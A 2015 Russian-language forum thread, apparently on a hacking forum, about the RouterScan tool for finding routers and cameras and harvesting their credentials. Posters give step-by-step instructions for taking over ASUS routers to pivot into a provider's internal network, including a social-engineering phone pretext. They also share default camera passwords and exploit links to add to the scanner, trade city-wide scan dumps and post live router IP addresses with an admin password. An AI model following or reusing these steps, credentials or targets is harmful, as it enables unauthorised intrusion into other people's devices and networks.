- Статический IP присваивается узлу один раз, и не меняется до тех пор, пока клиент оплачивает свой тариф интернета вовремя.

- Динамический IP меняется при каждом подключении (или реже, например, раз в сутки), может изменяться в диапазоне одной сети, а может даже в нескольких.

4. Внешний IP адрес

- Под внешним IP адресом понимается адрес, от имени которого клиент пользуется интернетом. Если он совпадает с адресом интерфейса сетевого адаптера, то он - глобальный.

5. Внутренний IP адрес

- Это может быть серый IP адрес, выданный провайдером, либо адрес локальной сети клиента, который находится за маршрутизатором.

При всём этом:

- Внешний адрес может быть динамическим и статическим. Он может быть серым или белым.

- Внутренний адрес также может быть либо динамическим, либо статическим. Но он всегда серый.

Городские сети с адресацией 10.0.0.0/8 - внутренние. При этом есть два варианта выхода в интернет - либо с помощью маршрутизации (такие адреса становятся серыми), либо с помощью туннелей (так провайдер может выдавать белые адреса).

akokarev
06.10.2015, 07:46
Приму это в знак вашей необразованности и невежества

1. Наверно вы не вкурсе но у провайдеров есть такое понятие как - белый,серый,внутренний IP (погугли и найди отличия)

2. есть перечень офф так вот мой динамически не попадает в них, а попадают туда только те у кого проплачена услуга белого IP - надеюсь понятно объяснил

3. пример Spark у целого квартала 1 внешний IP зато у всех разные 10.х.х.х. (Другими словами - хочешь хостить доту или варик покупай белый IP)

4. если ничего не поняли - то сканируйте по маске /8


То, о чем ты говоришь, называется NAT. За NAT'ом про сканировать роутер невозможно. Однако если ты находиться с жертвой в одной локальной сети (домашней, внутренний ip, серый - один фиг), то скан возможен. Более того, если просканить "белые" адреса провайдера и найти уязвимый роутер, то можно легко поднять VPN из внешки вовнутрь сети и просканить серые айпишки. И не факт, что у кого белые айпи такие прям шаристые и поэтому сменили пароли, обновили прошивки роутеров - по моему опыту очень много роутеров с белыми айпи и стандартными паролями!

vbez
06.10.2015, 09:54
при сканировании прога находит регистраторы и камеры но пароли почему то к ним не подбирает.хотя в словарях пароли есть(666666/666666 или admin/123456).так и должно быть или где то что то надо включить?

kolbak
06.10.2015, 12:16
Более того, если просканить "белые" адреса провайдера и найти уязвимый роутер, то можно легко поднять VPN из внешки вовнутрь сети и просканить серые айпишки.



можешь помочь такое провернуть? я напишу инструкцию + просканирую и добавлю в базу (имеется в наличии 3 виртуалки + 3 файфая соседей = за 20 часов примерно 15 сетей /16)



прога находит регистраторы и камеры



1) Прочитать инструкцию

2) Прислать автору дамп камер с логином и паролем или оформить здесь на форуме в "спойлере" на добавление (описание+ип+логи+пароль)



Товарищи...


Много уважаемый автор отправил тебе на мейл 3 письма:

1) частые мои пароли - может добавишь в перечень

2) 100 - роутеров, камер, принтеров и прочих прелестей (не ругайся я знаю как ты отреагируешь НО это к релизу, делаем ОДНО большое дело. Лайков получишь много, может где и зачтется )

3) дамп одного роутера соседей. WPS его вскрыл и отправляю также пасс, но вот RS их не видит. - короче посмотришь сам.

akokarev
06.10.2015, 16:04
можешь помочь такое провернуть? я напишу инструкцию + просканирую и добавлю в базу (имеется в наличии 3 виртуалки + 3 файфая соседей = за 20 часов примерно 15 сетей /16)



1. Выясни какие белые ip у провайдера (есть масса сервисов позволяющих это сделать)

2. Сканируй, ищи роутеры ASUS, на новых моделях/прошивках у них есть нужная фича.

3. Нашёл? Открывай веб морду роутера, ищи в настройках VPN сервер (или PPTP сервер), включай, добавляй пользователя со своим паролем. Чтобы меньше палить создавай пользователей аля admin, user, system и т.п.

Создаешь на своём компе pptp соединение, указываешь ip роутера, user, pass. Соединяешься...

4) Все, ты в сети провайдера, осталось выяснить диапазон ip адресов внутренних и просканировать его. Либо можешь влоб сканировать сети 10.0.0.0/8 172.16.0.0/16 192.168.0.0/16. Либо посмотри статус подключения в веб морде роутера, вполне возможно там есть подсказка. Смотри так же настройки маршрутизации (иногда по dhcp приходят пути до локальной сети), полезно полазать по сайту/форуму провайдера. Ну и в конце концов можно позвонить в ТП провайдера, сказать дескать "помогаю старику настроить роутер чтоб доступ был в локалку, подскажите какие у Вас внутренние адреса используется?.." - провайдер с удовольствием сам тебе все расскажет по телефону, чтобы не отправлять спеца.

P.S.: чтоб сто раз по новой не искать белые роутеры, включи DynDNS в настройках, придумай имя роутеры и подключался по нему. Например hacked123.asuscomm.com

sha9
07.10.2015, 13:42
Лайков получишь много, может где и зачтется )



лучше бы вместо лайков по одному баксу с человека автору подкинули в месяц. больше пользы бы было. а то он старается на голом энтузиазме. а кушать -то хочется всегда. он и так по совести поступает. а мог бы и бабки на своем сканере рубить. вон сколько у него паствы в сети.

kolbak
07.10.2015, 16:31
по одному баксу с человека



Бакс не кошерно. не стабилен он больно.

но к этому и придет.

тулза достойная лично я не против поддержать автора.

Ossen
07.10.2015, 19:44
3 виртуалки + 3 файфая соседей



три портсигара три магнитофона ........ улыбнуло малость

sha9
08.10.2015, 13:52
Бакс не кошерно. не стабилен он больно.



ну я же сказал хотя-бы ( в контексте) от каждого т.с. по возможностям, тогда каждому по потребностям все по дедушке марксу

а тулза не то, что достойная, а очень достойная. + сама идя.+ ее реализация...я удивляюсь как это еще автора не заманили в уса на дядю била работать.

sha9
08.10.2015, 14:04
кстати и на линухе пашет замечательно.под вином естественно

sha9
08.10.2015, 14:53
и еще. теперь по теме рутерскана. ув.binarymaster вы на сайте пишете, что эта прога рассчитана на роутеры и поддержка вэбкамер не предвидится. но мне кажется вы немного не правы. если она УЖЕ определяет камеры, то почему бы не использовать это? тем более никто не говорит о том, чтобы ее полностью заточить под вэбки с эксплойтами. ну может только мечтают.про себя. но можно ведь просто немного модифицировать код, чтобы она искала дефолты хотя бы. кроме админ-админ. например она определят только админ-админ, хотя в пасах выставил и 999999 и 88888. эти пасы проходят на рви. причем прога определяет камеры рви а пасы не применяет. пасы потом чисто ручками просто в коде можно было бы выставить сопоставление скажем рви и хиквижн + подбор дефолтовых пасов. это ведь не сложно? небольшое изменение, а выхлоп на миллион

sha9
08.10.2015, 14:56
три портсигара три магнитофона ........ улыбнуло малость


еще куртки замшевых импортных. тоже три

binarymaster
08.10.2015, 20:32
ув.binarymaster вы на сайте пишете, что эта прога рассчитана на роутеры и поддержка вэбкамер не предвидится. но мне кажется вы немного не правы. если она УЖЕ определяет камеры, то почему бы не использовать это?



Программа не то что бы не рассчитана для них, а преследует свою основную цель - получение информации о беспроводных точках.

Я добавляю в поддержку устройства, из которых такую информацию можно добыть. Некоторые камеры содержат профиль беспроводной сети, к которой подключаются в режиме клиента. Вот такие камеры я и добавляю.

Остальные сетевые устройства тоже добавляю, но они не в приоритете.

zimmer
08.10.2015, 22:03
ковырялся на секлабе и нашел эксплоит для нетгеаров, если нет его в проге, то думаю что дтшним не будет, темболее что выложен он там относительно не давно...

http://www.securitylab.ru/poc/471412.php

zimmer
08.10.2015, 22:07
и вот ещё для медиасервера флюсоник, может добавиш тоже...

http://www.securitylab.ru/poc/454672.php

+ в тп-линках бекдор, правда староваь он, но всеже вдруг его нету...

http://sekurak.pl/tp-link-httptftp-backdoor/

+ http://www.securitylab.ru/news/448983.php (ссылка на пос код внизу статьи)

+ http://www.securitylab.ru/vulnerability/456069.php (также внизу ссылка)

+ http://www.securitylab.ru/vulnerability/440949.php (если продолжить тему вебкамер)

и ещё, ув. автор, где можно посмотреть список какие уязвимости уже используются? чтобы тут не постить то что давно уже реализованно....

binarymaster
09.10.2015, 01:56
http://www.securitylab.ru/poc/471412.php



Этот уже реализован.



и вот ещё для медиасервера флюсоник, может добавиш тоже...

http://www.securitylab.ru/poc/454672.php



Там можно как-то получить пароль администратора, читая какой-то файл? Не разобрался пока. И есть ли образцы?



http://sekurak.pl/tp-link-httptftp-backdoor/



Этот реализовать не получится, в нём требуется удалённый сервер.



+ http://www.securitylab.ru/news/448983.php (ссылка на пос код внизу статьи)



Реализовано.



+ http://www.securitylab.ru/vulnerability/456069.php (также внизу ссылка)



Это та же самая уязвимость, что ссылкой выше.



+ http://www.securitylab.ru/vulnerability/440949.php (если продолжить тему вебкамер)



А вот тут образцы нужны.



где можно посмотреть список какие уязвимости уже используются?



Есть раздел документации, там же и ссылки есть.

zimmer
09.10.2015, 19:06
ок, поищу завтра рабочие хосты, а впредь если найду эксплоиты, то буду кидать с примерами. Ну и вопрос который наверно все хотят тут задать: когда релиз?)))) вроде ещё на прошлой неделе говорил что скоро

binarymaster
10.10.2015, 02:30
когда релиз?)))) вроде ещё на прошлой неделе говорил что скоро


В сборке есть один неуловимый Джо баг, который сложно воспроизвести, пытаюсь его исправить.

Ну и ещё доки не дописал, строчу терминологию.

user100
10.10.2015, 12:43
Свеженький обход аутентификации на роутерах Netgear:

http://seclists.org/fulldisclosure/2015/Oct/29

Возможно пригодиться для добавления в RouterScan.

binarymaster
10.10.2015, 21:26
Свеженький обход аутентификации на роутерах Netgear:

http://seclists.org/fulldisclosure/2015/Oct/29

Возможно пригодиться для добавления в RouterScan.



Ещё как пригодится, это же 0day. Добавил. Оказалась уязвима ещё пара устройств этой же линейки, не описанных в статье, мощная такая уязвимость...

CRACK211
11.10.2015, 22:55
постоянна выскакивает ошибка. сканирование останавливается но программа не закрывается после нажатия ОК или отмена вин хр последняя бета 2.53

http://rghost.ru/7mThqHQNа

pro100boy
13.10.2015, 09:53
Здраствуйте,кто сможет просканировать г.Ровно,Украина и скинуть мне в файле,буду очень благодарен

erwerr2321
13.10.2015, 18:22
Здраствуйте,кто сможет просканировать г.Ровно,Украина и скинуть мне в файле,буду очень благодарен



Скинул))

nefelin
13.10.2015, 22:57
такая же просьба для Франкфурта на Майне!спасибо

MiLSaN
13.10.2015, 23:53
Разработчику, добавьте пожалуйста возможность "Rescan" одной кнопкой, для всех хостов, которые например улетели в ошибку с "Connection timeout"

А то бывает при сканировании с большим количеством потоков, некоторые хосты улетают в такую ошибку, и что бы потом вручную не искать и не тыкать каждый хост, не помешала бы такая кнопка=)

Заранее спасибо=)

sha9
15.10.2015, 20:44
доброго времени суток уважаемый бинаримастер столкнулся с таким рутером TOTOLINK N150RT роутерскан определил только название и усё. пришлось ручками. но не в этом дело. вот есть эксплойтик 07.2015 г. exploit-db.com/exploits/37626/ нельзя ли его пристегнуть к рутерскану? этот рутер встречается в моих краях не часто но может кому пригодится. и еще, продолжая тему вебкамер. касаемо hikvision (довольно часто попадаются, особенно на 554 порту, наряду с RVI на 80-м). на 0day есть неплохие сплойтики для них может имеет смысл тоже их подключить для разнообразия проекта

kadet
16.10.2015, 01:28
Мне кажется, автору проги пора бы просто задуматься о создании другой программы. Специальной для поиска камер и подбора паролей, т.к. большинство народа интересуют камеры Да и я сам бы не против был бы такой )

sha9
16.10.2015, 11:17
там одни офисы, сидят за компами противные девки



дык не для развлекухи или порнухи нужно. для работы. особенно тем кто занимается пентестом. а за пентест платят не голые блонди, а суръёзные дяди в офисах с противными девками

sha9
16.10.2015, 11:22
Мне кажется, автору проги пора бы просто задуматься о создании другой программы. Специальной для поиска камер и подбора паролей, т.к. большинство народа интересуют камеры Да и я сам бы не против был бы такой )



ну зачем-же отдельную прогу? можно просто отельную вкладку сделать в самой проге. тем более что она и так прекрасно пробивает. правда только по дефолту пасов. и правда не всегда ( есть случаи с рви и пасами по дефолту. ручками есть, а автоматом нет).нужно не навязчиво добавить проверку камер по експлойтам и усё.тем более что на большинство камер есть хорошие эксплойты на дб и 0дэй. обходят авторизацию. но ручками достает. особенно когда время и объемы.

erwerr2321
16.10.2015, 13:59
ну зачем-же отдельную прогу? можно просто отельную вкладку сделать в самой проге. тем более что она и так прекрасно пробивает. правда только по дефолту пасов. и правда не всегда ( есть случаи с рви и пасами по дефолту. ручками есть, а автоматом нет).нужно не навязчиво добавить проверку камер по експлойтам и усё.тем более что на большинство камер есть хорошие эксплойты на дб и 0дэй. обходят авторизацию. но ручками достает. особенно когда время и объемы.



Если Вы не поняли, объясню, он на то и RouterScan....

А для брута cam админок есть множество других старых и проверенных методов!



нужно не навязчиво добавить проверку камер по експлойтам и усё.



и ненавязчиво почему-то никак не выходит...

c9h13-n
16.10.2015, 19:44
Можно попросить перезалить?

binarymaster
16.10.2015, 21:05
Можно попросить перезалить?



https://forum.antichat.ru/posts/3889615

sha9
17.10.2015, 14:07
Если Вы не поняли, объясню, он на то и RouterScan....



да вот как-то туго доходит. не сообразил. и похоже что не я один и кстати, по поводу старых методов. новое всегда привлекательнее. тем более если оно прогрессивно. но хозяин - барин. на нет - и суда нет. будем иметь, то что предложат и за то огромное спасибо

Payer
17.10.2015, 23:13
https://forum.antichat.ru/posts/3889615



Заглянул в ветку в ожидании новой версии и расстроился.....

С 10 сентября скачали 126 раз бету, а нажать кнопку "спасибо" получилось только у четырех человек.

Там на офсайте все пароль на архив подбирать пробуют - тот который человеческим языком написан на большом банере....

Короче, мы сделали все возможное, чтобы отбить у автора охоту развивать проект.

Теперь еще и камерами забодаем и можно спать спокойно.

TOX1C
17.10.2015, 23:22
С 10 сентября скачали 126 раз бету, а нажать кнопку "спасибо" получилось только у четырех человек.



Суть не в спасибках, а в том, что было сделано программой -благодаря ней у нас уже есть база больше пол лимона разных точек, с помощью проги и данных ею добытых удалось добыть стандартные пароли, пин-коды, алгоритмы их генерации и тому подобное.

ИМХО для камер нужен отдельный софт, это все таки РОУТЕР скан, а не камера-скан

Payer
17.10.2015, 23:49
Суть не в спасибках



Спасибки это обратная связь. Если автор выкладывает в свободный доступ результаты своего труда и получает только четыре отзыва - это ненормально.

Я сейчас скопипасчу кисяк-писек и получу стопяццот отзывов. Ничего по сути не делая.

Где ж справедливость?

Получил в руки отличный инструмент так хоть кнопку прижать найди время! Чай рука не отвалится и с банковского счета деньги за это не спишут.

Я так думаю...

Ossen
18.10.2015, 00:10
Суть не в спасибках






Спасибки это обратная связь.



Без ругани пожалуйста горячие Финские парни релиз скоро надеюсь будет но думаю стоит потестить предрелизный вариант на предмет ошибок как старых так и новых. ps: если автор сочтёт нужным конечно

Ossen
18.10.2015, 03:35
Huawei Technologies HG8245H https://178.71.28.97:80/ https://178.67.243.245:80

https://178.67.212.69:80

мастер пароль telecomadmin: NWTF5x%RaK8mVbD

ek-nfn
18.10.2015, 06:33
Обязательно ли ждать завершения определения координат при загрузке файла данных в базу (со страницы сайта) ? Можно ли не дожидаясь завершения этой операции переходить к загрузке следующих файлов ?

CRACK211
18.10.2015, 09:44
Сегодня утром выскочила таже ошибка что постом выше, но после нажатия ОК выскочила новая http://rghost.ru/69FVTWzVs